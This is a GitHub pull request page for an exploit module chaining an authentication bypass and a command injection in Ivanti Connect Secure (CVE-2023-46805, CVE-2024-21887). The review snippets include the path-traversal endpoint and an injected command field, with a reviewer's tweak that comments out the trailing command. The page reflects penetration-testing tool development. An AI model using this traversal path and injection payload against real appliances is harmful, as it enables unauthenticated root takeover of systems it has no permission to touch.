-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Ivanti Connect Secure RCE exploit module (CVE-2023-46805 and CVE-2024-21887) #18708
Conversation
… key we expect it to have
documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2023_46805.md
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb
Outdated
Show resolved
Hide resolved
'uri' => '/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection', | ||
'ctype' => 'application/json', | ||
'data' => { | ||
'type' => ";#{cmd};", |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
'type' => ";#{cmd};", | |
'type' => ";#{cmd}#", |
since this is a command injection, using a comment (#
) will prevent the trailing part of the original command from being executed, and ultimately showing up in the log as it fails.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
…_rce_cve_2023_46805.md Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
…_46805.rb Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
…_46805.rb Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
… portion of the command string (Thank you @jvoisin). We must also include a space character for this to work as expected, doing so also removes the need to bootstrap the Linux payloads with a separate file.
# is only for display purposes, we don't need to test the version information. | ||
|
||
begin | ||
json_data = JSON.parse(res.body) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
get_json_document
may be a better option
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I implemented this suggestion via de6ed9e
Linux Command
Unix Command
|
Release NotesThis PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected. |
This is a
draftpull request for the recent 0day exploit chain against Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887)For technical details on the vulnerabilities used in this exploit, read our AttackerKB Analysis:
To-Do:
Example Usage